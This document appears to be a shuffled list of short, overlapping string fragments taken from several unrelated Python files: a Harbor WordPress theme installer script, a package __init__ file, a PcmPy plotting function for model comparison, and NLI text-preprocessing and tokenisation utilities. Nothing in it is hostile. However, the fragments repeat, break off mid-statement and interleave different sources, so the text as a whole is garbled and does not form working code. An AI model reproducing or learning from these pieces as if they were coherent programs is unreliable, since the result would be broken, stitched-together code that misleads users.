"is not None: os.chdir(setup_dir) if platform.system() != \"Windows\": if os.getuid() != 0: print(\"Please",
"file.close() for change in strings: filedata = filedata.replace(change[0], change[1]) file = open(filename, \"w\")",
"Name: Harbor\", \"Theme Name: \" + name)) headerInfo.append((\"Description: Harbor is a starter theme",
"for the theme: \") slug = name.lower().replace(' ', '-') funcSlug = name.lower().replace(' ',",
"Domain: harbor\", \"Text Domain: \" + slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme Name: \"",
"slug def findInFiles(strings, files): for filename in files: file = open(filename, \"r\") filedata",
"print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing",
"-g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm",
"action='store', dest='dir', help=\"Specify a directory to install Harbor theme to or if -u",
"not None: os.chdir(setup_dir) if platform.system() != \"Windows\": if os.getuid() != 0: print(\"Please run",
"\") os.system(\"bower update \" + name) print(\"\") print(\"Done!\") # Downloads the starter theme",
"0: print(\"Please run this script as root\") print(\"Example: 'sudo python3 setup.py'\") return #download",
"'--install', action='store_true', dest='install', default=False, help=\"Install harbor theme in current directory\") parser.add_argument('-d', '--directory', action='store',",
"print(\"\") print(\"Done!\") # Downloads the starter theme _s from github def fetchArchive(): try:",
"== False: return 1 print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug) elif update:",
"as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file:",
"the harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor theme in current",
"downloading the files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\")",
"Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\")",
"'--directory', action='store', dest='dir', help=\"Specify a directory to install Harbor theme to or if",
"return #download theme zip if fetchArchive() == False: return 1 print(\"Setting up Theme...\")",
"breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\") as update_file: for line in update_file: results",
"print(\"Done!\") return True def setupTheme(): name = input(\"Enter a name for the theme:",
"print('Done!') return slug def findInFiles(strings, files): for filename in files: file = open(filename,",
"harbor theme in current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a directory to",
"file.status_code != 200: print(\"Error: There was a problem while downloading the files.\\n\\tAborting. \")",
"is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\")",
"as root\") print(\"Example: 'sudo python3 setup.py'\") return #download theme zip if fetchArchive() ==",
"+ slug + \"/*.php\") for filename in glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename)",
"for the theme: \") print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug)",
"print(\"updating\", name, sep=\" \") os.system(\"bower update \" + name) print(\"\") print(\"Done!\") # Downloads",
"if platform.system() == \"Windows\" else \"which\" npm = subprocess.run(cmd+ \" npm\", shell=True) if",
"the Harbor based theme in that directory\") plat = platform.system() results = parser.parse_args()",
"a short description for the theme: \") print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\",",
"FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code !=",
"setup by Infinity Marketing that is heavily based on Automattic's Underscores theme.\", \"Description:",
"not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp",
"utf-8 -*- \"\"\" Created on Thu Aug 3 14:20:50 2017 @author: <NAME> \"\"\"",
"in update_file: results = update_avail.findall(line) if results != []: print(line) nameMatch = nameRe.search(line)",
"filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\"",
"+ name)) headerInfo.append((\"Description: Harbor is a starter theme and development environment setup by",
"name) print(\"\") print(\"Done!\") # Downloads the starter theme _s from github def fetchArchive():",
"\") print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files = glob.glob(\"./\"",
"npm\", shell=True) if npm.returncode == 1: print(\"NodeJs is not installed. Aborting\") return bower",
"gulp = subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp",
"= name.lower().replace(' ', '_') desc = input(\"Enter a short description for the theme:",
"def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check for updates",
"a problem while downloading the files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\", \"wb\") as",
"help=\"Install harbor theme in current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a directory",
"is not None: updateTheme(setup_dir) else: print(\"Checking for updates to Harbor script...\") print(\"Up to",
"sep=\" \") os.system(\"bower update \" + name) print(\"\") print(\"Done!\") # Downloads the starter",
"== 1: print(\"Gulp is not installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g",
"was a problem while downloading the files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\", \"wb\")",
"print(\"Done!\") gulp = subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1:",
"\"\" or ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \") os.system(\"bower update \" +",
"import os import requests import glob import subprocess import platform import sys, getopt",
"\"./\" + slug) files = glob.glob(\"./\" + slug + \"/*.php\") for filename in",
"zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return True def setupTheme(): name = input(\"Enter",
"if fetchArchive() == False: return 1 print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug)",
"= \"where\" if platform.system() == \"Windows\" else \"which\" npm = subprocess.run(cmd+ \" npm\",",
"\"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \"",
"None: os.chdir(setup_dir) if platform.system() != \"Windows\": if os.getuid() != 0: print(\"Please run this",
"1: print(\"Bower is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE,",
"= nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while ans != \"\" and ans.lower()[0] !=",
"pass print(\"Downloading Theme files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200:",
"if(install): if setup_dir is not None: os.chdir(setup_dir) if platform.system() != \"Windows\": if os.getuid()",
"print(\"NodeJs is not installed. Aborting\") return bower = subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE,",
"return False with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ')",
"name, sep=\" \") os.system(\"bower update \" + name) print(\"\") print(\"Done!\") # Downloads the",
"= parser.parse_args() install = results.install update = results.update setup_dir = results.dir if(install): if",
"to Harbor script...\") print(\"Up to date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\")",
"Downloads the starter theme _s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError:",
"theme in that directory\") plat = platform.system() results = parser.parse_args() install = results.install",
"re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\") as",
"change in strings: filedata = filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata) file.close()",
"bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+ \"",
"gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\",",
"def setupEnvironment(slug): cmd = \"where\" if platform.system() == \"Windows\" else \"which\" npm =",
"+ slug + \"/style.css\", \"./\" + slug + \"/sass/style.scss\"]) print('Done!') return slug def",
"slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme Name: \" + name)) headerInfo.append((\"Description: Harbor is a",
"#exit(0) with open(\"updates.tmp\", \"r\") as update_file: for line in update_file: results = update_avail.findall(line)",
"files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" + slug)) headerInfo.append((\"Theme",
"ans != \"\" and ans.lower()[0] != 'y' and ans.lower()[0] != 'n': ans =",
"\"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" +",
"platform.system() != \"Windows\": if os.getuid() != 0: print(\"Please run this script as root\")",
"theme to or if -u option is present updates the Harbor based theme",
"elif update: if setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking for updates to",
"in files: file = open(filename, \"r\") filedata = file.read() file.close() for change in",
"funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace(' ', '_') + \"</code>\"))",
"nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\") as update_file: for",
"subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True, cwd=\"./\"+slug) print(\"Done!\") if(__name__ == \"__main__\"): main()",
"os import requests import glob import subprocess import platform import sys, getopt import",
"setup_dir = results.dir if(install): if setup_dir is not None: os.chdir(setup_dir) if platform.system() !=",
"results != []: print(line) nameMatch = nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update",
"') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return True def setupTheme(): name",
"file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\" if platform.system() == \"Windows\" else \"which\"",
"Theme...\") slug = setupTheme() setupEnvironment(slug) elif update: if setup_dir is not None: updateTheme(setup_dir)",
"import subprocess import platform import sys, getopt import argparse import re def main():",
"'_') + \"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text",
"+ slug + \"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings, files): for filename in",
"1 print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug) elif update: if setup_dir is",
"results.update setup_dir = results.dir if(install): if setup_dir is not None: os.chdir(setup_dir) if platform.system()",
"plat = platform.system() results = parser.parse_args() install = results.install update = results.update setup_dir",
"return slug def findInFiles(strings, files): for filename in files: file = open(filename, \"r\")",
"There was a problem while downloading the files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\",",
"parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor theme in current directory\") parser.add_argument('-d', '--directory',",
"a name for the theme: \") slug = name.lower().replace(' ', '-') funcSlug =",
"if npm.returncode == 1: print(\"NodeJs is not installed. Aborting\") return bower = subprocess.run(cmd+",
"development environment setup by Infinity Marketing that is heavily based on Automattic's Underscores",
"that directory\") plat = platform.system() results = parser.parse_args() install = results.install update =",
"print(\"Done!\") print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return",
"else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list > updates.tmp\") update_avail =",
"slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace('",
"that is heavily based on Automattic's Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo,",
"200: print(\"Error: There was a problem while downloading the files.\\n\\tAborting. \") return False",
"files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\",",
"install = results.install update = results.update setup_dir = results.dir if(install): if setup_dir is",
"print(\"Please run this script as root\") print(\"Example: 'sudo python3 setup.py'\") return #download theme"
] |
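For orientation, a short usage sketch; the setup.py file name is only inferred from the script's own root-check hint, and the directory paths are illustrative:

# Scaffold a new Harbor-based theme in the current directory (root is required on non-Windows):
#   sudo python3 setup.py -i
# Scaffold into a specific themes directory (hypothetical path):
#   sudo python3 setup.py -i -d /var/www/html/wp-content/themes
# Check an existing theme's bower modules for updates:
#   python3 setup.py -u -d ./my-theme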
# green/__init__.py
from __future__ import unicode_literals

from .cmdline import main
from .version import __version__

# Referenced here so the imports register as the package's public exports
main
__version__
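A minimal consumption sketch; it assumes the package is installed as green (the test runner these re-exports belong to) and that .cmdline.main is its command-line entry point:

import green

print(green.__version__)  # version string re-exported by the package root
# green.main() would hand control to the command-line test runner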
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# PcmPy/vis.py
"""
Functions for visualization of PCM models, Data, and model fits

@author: jdiedrichsen
"""
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
import matplotlib.lines as mlines
import seaborn as sb
import pandas as pd


def model_plot(likelihood, null_model=0, noise_ceiling=None, upper_ceiling=None):
    """
    Make model comparison plot

    Parameters:
        likelihood (pd.DataFrame)
            Data Frame with the results (from T.likelihood)
        null_model (int or string)
            Number or name of the model that defines the zero-point
        noise_ceiling (int or string)
            Number or name of the model that defines the noise ceiling
        upper_ceiling (np.array or series)
            Likelihood for the upper noise ceiling (usually from group fit)

    Returns:
        ax (matplotlib.Axis.axis)
            Matplotlib axis object
    """
    noise_ceil_col = [0.5, 0.5, 0.5, 0.2]
    m_names = likelihood.columns.values
    if type(null_model) != str:
        null_model = m_names[null_model]
    if noise_ceiling is not None:
        if type(noise_ceiling) != str:
            noise_ceiling = m_names[noise_ceiling]
    # Subtract the baseline
    baseline = likelihood.loc[:, null_model].values
    likelihood = likelihood - baseline.reshape(-1, 1)
    # Stretch out the data frame
    LL = pd.melt(likelihood)
    indx = np.logical_and(LL.model != null_model, LL.model != noise_ceiling)
    ax = sb.barplot(x=LL.model[indx], y=LL.value[indx])
    xlim = ax.get_xlim()
    if noise_ceiling is not None:
        noise_lower = np.nanmean(likelihood[noise_ceiling])
        if upper_ceiling is not None:
            noise_upper = np.nanmean(upper_ceiling - baseline)
            noiserect = patches.Rectangle(
                (xlim[0], noise_lower), xlim[1] - xlim[0], noise_upper - noise_lower,
                linewidth=0, facecolor=noise_ceil_col, zorder=1e6)
            ax.add_patch(noiserect)
        else:
            l = mlines.Line2D([xlim[0], xlim[1]], [noise_lower, noise_lower],
                              color=[0, 0, 0], linestyle=':')
            ax.add_line(l)
    ax.set_ylabel('Log Bayes Factor')
    return ax
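A hedged usage sketch for model_plot (not from the PcmPy source): the data frame is synthetic stand-in data, and naming the columns axis 'model' is assumed so that pd.melt yields the 'model' column the function accesses.

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt

rng = np.random.default_rng(0)
likelihood = pd.DataFrame({
    "null": rng.normal(0, 1, 20),      # zero-point model (hypothetical)
    "model_a": rng.normal(5, 1, 20),
    "model_b": rng.normal(7, 1, 20),
    "ceiling": rng.normal(9, 1, 20),   # stands in for a noise-ceiling fit
})
likelihood.columns.name = "model"      # pd.melt then produces a 'model' column

ax = model_plot(likelihood, null_model="null", noise_ceiling="ceiling")
plt.show()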
# NLI data-processing utilities: premise | hypothesis | label CSVs -> transformers features
import re
import logging
import torch
import os
import pandas as pd
import numpy as np
from multiprocessing import Pool
import random
from transformers.data.processors.utils import InputExample, InputFeatures
from transformers.data.processors.utils import DataProcessor
from torch.utils.data import TensorDataset

logging.basicConfig(filename='example.log', level=logging.INFO)

spaces = re.compile(' +')


def merge_lists(lists):
    base = []
    for l in lists:
        base.extend(l)
    return base


def parallelize_df2df(df, func, n_cores):
    """ general function to parallelize a function applied to a df """
    df_split = np.array_split(df, n_cores)
    pool = Pool(n_cores)
    df = pd.concat(pool.map(func, df_split))
    pool.close()
    pool.join()
    return df


def parallelize_df2list(df, func, n_cores):
    """ general function to parallelize a function applied to a df """
    df_split = np.array_split(df, n_cores)
    pool = Pool(n_cores)
    result = merge_lists(pool.map(func, df_split))
    pool.close()
    pool.join()
    return result


def remove_first_space(x):
    """
    remove_first_space from word x

    :param x: word
    :type x: str
    :return: word without space in front
    :rtype: str
    """
    try:
        if x[0] == " ":
            return x[1:]
        else:
            return x
    except IndexError:
        return x


def simple_pre_process_text(data, text_column):
    """
    preprocess all input text from dataframe by lowering, removing non
    words, removing space in the first position and removing double spaces

    :param data: data frame with the column text_column
    :type data: pd.DataFrame
    :param text_column: column text_column
    :type text_column: str
    """
    s = data.loc[:, text_column].copy()
    s = s.apply(lambda x: x.lower())
    s = s.apply((lambda x: re.sub(r'[^a-zA-Z0-9\s]', '', x)))  # noqa
    s = s.apply(remove_first_space)  # noqa remove space in the first position
    s = s.apply((lambda x: spaces.sub(" ", x)))  # noqa remove double spaces
    return s


def pre_process_nli_df(data):
    """
    Apply simple_pre_process_text to the 'premise' and 'hypothesis' columns

    :param data: data frame with the columns 'premise' and 'hypothesis'
    :type data: pd.DataFrame
    """
    new_p = simple_pre_process_text(data, text_column="premise")
    new_h = simple_pre_process_text(data, text_column="hypothesis")
    label = data.label
    o_index = data.o_index
    dict_ = {"premise": new_p,
             "hypothesis": new_h,
             "label": label,
             "o_index": o_index}
    return pd.DataFrame(dict_)


def filter_df_by_label(df, drop_label='-'):
    """ drop observations with label 'drop_label' """
    return df.loc[df.label != drop_label]


def clean_df(df, n_cores):
    """ return clean version of the dataframe with the original index """
    df_new = df.copy()
    df_new.loc[:, "o_index"] = df.index
    df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True)
    df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores)
    return df_new


class NLIProcessor(DataProcessor):
    """Processor for any NLI data frame in csv
    (columns = premise | hypothesis | label)"""

    def __init__(self, hyperparams):
        super().__init__()
        self.tokenizer = hyperparams["tokenizer"]
        self.max_length = hyperparams["max_seq_length"]
        self.pad_on_left = hyperparams["pad_on_left"]
        self.pad_token = hyperparams["pad_token"]
        self.pad_token_segment_id = hyperparams["pad_token_segment_id"]
        self.mask_padding_with_zero = hyperparams["mask_padding_with_zero"]
        self.base_path = hyperparams["base_path"]

    def df2examples(self, df, set_type):
        df = filter_df_by_label(df.dropna()).reset_index(drop=True)
        df = pre_process_nli_df(df)
        examples = self._create_examples(df, set_type)
        return examples

    def get_train_examples(self, df):
        return self.df2examples(df, "train")

    def get_dev_examples(self, df):
        return self.df2examples(df, "dev")

    def df2examples_parallel_train(self, df, n_cores):
        df_new = df.copy()
        if "o_index" not in df_new.columns:
            df_new.loc[:, "o_index"] = df.index
        result = parallelize_df2list(df_new, self.get_train_examples, n_cores)
        del df_new
        return result

    def df2examples_parallel_dev(self, df, n_cores):
        df_new = df.copy()
        df_new.loc[:, "o_index"] = df.index
        # dispatch assumed by symmetry with the train variant above
        result = parallelize_df2list(df_new, self.get_dev_examples, n_cores)
        del df_new
        return result

    def get_labels(self):
        return ["contradiction", "entailment", "neutral"]

    def get_label_map(self):
        label_list = self.get_labels()
        label_map = {label: i for i, label in enumerate(label_list)}
        return label_map

    def _create_examples(self, df, set_type):
        """Creates examples for the training and dev sets."""
        examples = []
        n = df.shape[0]
        for i in range(n):
            example = df.loc[i]
            name = example.o_index
            guid = "{}-{}".format(set_type, name)
            input_example = InputExample(guid=guid,
                                         text_a=example.premise,
                                         text_b=example.hypothesis,
                                         label=example.label)
            examples.append(input_example)
        return examples

    def _convert_examples_to_features(self, examples):
        max_length = self.max_length
        pad_token = self.pad_token
        pad_token_segment_id = self.pad_token_segment_id
        mask_padding_with_zero = self.mask_padding_with_zero
        label_map = self.get_label_map()
        features = []
        for (ex_index, example) in enumerate(examples):
            len_examples = len(examples)
            inputs = self.tokenizer.encode_plus(example.text_a,
                                                example.text_b,
                                                add_special_tokens=True,
                                                max_length=max_length)
            input_ids, token_type_ids = inputs["input_ids"], inputs["token_type_ids"]
            # The mask has 1 for real tokens and 0 for padding tokens. Only real
            # tokens are attended to.
            attention_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)
            # Zero-pad up to the sequence length.
            padding_length = max_length - len(input_ids)
            if self.pad_on_left:
                input_ids = ([pad_token] * padding_length) + input_ids
                attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask
                token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids
            else:
                input_ids = input_ids + ([pad_token] * padding_length)
                attention_mask = attention_mask + \
                    ([0 if mask_padding_with_zero else 1] * padding_length)
                token_type_ids = token_type_ids + \
                    ([pad_token_segment_id] * padding_length)
            assert len(input_ids) == max_length, "Error with input length {} vs {}".format(
                len(input_ids), max_length)
            assert len(attention_mask) == max_length, "Error with input length {} vs {}".format(
                len(attention_mask), max_length)
            assert len(token_type_ids) == max_length, "Error with input length {} vs {}".format(
                len(token_type_ids), max_length)
            label = label_map[example.label]
            features.append(InputFeatures(input_ids=input_ids,
                                          attention_mask=attention_mask,
                                          token_type_ids=token_type_ids,
                                          label=label))
        return features

    def examples2features_parallel(self, examples, n_cores):
        result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores)
        return result

    def df2features(self, df, n_cores, mode):
        path = self.base_path + "{}_{}".format(mode, self.max_length)
        logging.info("Saving features in file: %s", path)
        if mode.find("train") > -1:
            examples = self.df2examples_parallel_train(df, n_cores)
        else:
            examples = self.df2examples_parallel_dev(df, n_cores)
        features = self.examples2features_parallel(examples, n_cores)
        torch.save(features, path)
        return path


def features2dataset(cached_features_file):
    assert os.path.exists(cached_features_file)
    logging.info("Loading features from cached file %s", cached_features_file)
    features = torch.load(cached_features_file)
    all_input_ids = torch.tensor(
        [f.input_ids for f in features], dtype=torch.long)
    all_attention_mask = torch.tensor(
        [f.attention_mask for f in features], dtype=torch.long)
    all_token_type_ids = torch.tensor(
        [f.token_type_ids for f in features], dtype=torch.long)
    all_labels = torch.tensor([f.label for f in features], dtype=torch.long)
    dataset = TensorDataset(
        all_input_ids, all_attention_mask, all_token_type_ids, all_labels)
    return dataset
"dataframe by lowering, removing non words, removing space in the first position and",
"return result def df2examples_parallel_dev(self, df, n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index",
"= torch.tensor( [f.attention_mask for f in features], dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids for",
"len(examples) inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] #",
"in the first position and removing double spaces :param data: data frame with",
"df_new return result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list =",
"length. padding_length = max_length - len(input_ids) if self.pad_on_left: input_ids = ([pad_token] * padding_length)",
"| hypothesis | label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length =",
"pool = Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df def parallelize_df2list(df,",
"n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for the any nli dataf frame in",
"import DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +') def",
"df_new.columns: df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return",
"\"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close()",
"preprocess on the input text from a NLI dataframe :param data: data frame",
"examples def _convert_examples_to_features(self, examples): max_length = self.max_length pad_token = self.pad_token pad_token_segment_id = self.pad_token_segment_id",
"return x except IndexError: return x def simple_pre_process_text(data, text_column): \"\"\" preprocess all input",
"Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df def parallelize_df2list(df, func, n_cores):",
"def get_dev_examples(self, df): return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores): df_new = df.copy()",
"s = s.apply(remove_first_space) # noqa remove space in the first position s =",
":type x: str :return: word withou space in front :rtype: str \"\"\" try:",
"parallelize_df2df(df, func, n_cores): \"\"\" general fucntion to parallelize a function applied to a",
"max_length, \"Error with input length {} vs {}\".format( len(token_type_ids), max_length) label = label_map[example.label]",
"features = self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading",
"dataframe with the original index \"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index",
"= label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self, examples, n_cores): result",
"x))) # noqa remove double spaces return s def pre_process_nli_df(data): \"\"\" Apply preprocess",
"label=label)) return features def examples2features_parallel(self, examples, n_cores): result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return",
"example = df.loc[i] name = example.o_index guid = \"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid,",
"if mask_padding_with_zero else 0] * len(input_ids) # Zero-pad up to the sequence length.",
"set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples = self._create_examples(df, set_type) return examples",
"token_type_ids = token_type_ids + \\ ([pad_token_segment_id] * padding_length) assert len(input_ids) == max_length, \"Error",
"= InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self, examples): max_length =",
"= s.apply(lambda x: x.lower()) s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa",
"torch.tensor( [f.token_type_ids for f in features], dtype=torch.long) all_labels = torch.tensor([f.label for f in",
"> -1: examples = self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores) features =",
"for the any nli dataf frame in csv (columns = premise | hypothesis",
"__init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token",
"df, n_cores): df_new = df.copy() if \"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"] =",
"def simple_pre_process_text(data, text_column): \"\"\" preprocess all input text from dataframe by lowering, removing",
"are attended to. attention_mask = [ 1 if mask_padding_with_zero else 0] * len(input_ids)",
"self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features, path)",
"df_split = np.array_split(df, n_cores) pool = Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close() pool.join()",
"n = df.shape[0] for i in range(n): example = df.loc[i] name = example.o_index",
"return x[1:] else: return x except IndexError: return x def simple_pre_process_text(data, text_column): \"\"\"",
"= self.pad_token pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero label_map = self.get_label_map() features =",
"spaces return s def pre_process_nli_df(data): \"\"\" Apply preprocess on the input text from",
"self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"] def df2examples(self, df, set_type):",
"def df2examples(self, df, set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples = self._create_examples(df,",
"= ([pad_token_segment_id] * padding_length) + token_type_ids else: input_ids = input_ids + ([pad_token] *",
"logging.info(\"Saving features in file: %s\", path) if mode.find(\"train\") > -1: examples = self.df2examples_parallel_train(df,",
"examples for the training and dev sets.\"\"\" examples = [] n = df.shape[0]",
"set_type): \"\"\"Creates examples for the training and dev sets.\"\"\" examples = [] n",
"text from dataframe by lowering, removing non words, removing space in the first",
"remove_first_space(x): \"\"\" remove_first_space from word x :param x: word :type x: str :return:",
"general fucntion to parallelize a function applied to a df \"\"\" df_split =",
"text_column): \"\"\" preprocess all input text from dataframe by lowering, removing non words,",
"n_cores, mode): path = self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in file: %s\",",
"mode): path = self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in file: %s\", path)",
"in features], dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids for f in features], dtype=torch.long) all_labels",
"[] for l in lists: base.extend(l) return base def parallelize_df2df(df, func, n_cores): \"\"\"",
"'', x))) # noqa s = s.apply(remove_first_space) # noqa remove space in the",
"label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self, examples, n_cores):",
"os import pandas as pd import numpy as np from multiprocessing import Pool",
"if self.pad_on_left: input_ids = ([pad_token] * padding_length) + input_ids attention_mask = ([0 if",
"{\"premise\": new_p, \"hypothesis\": new_h, \"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'):",
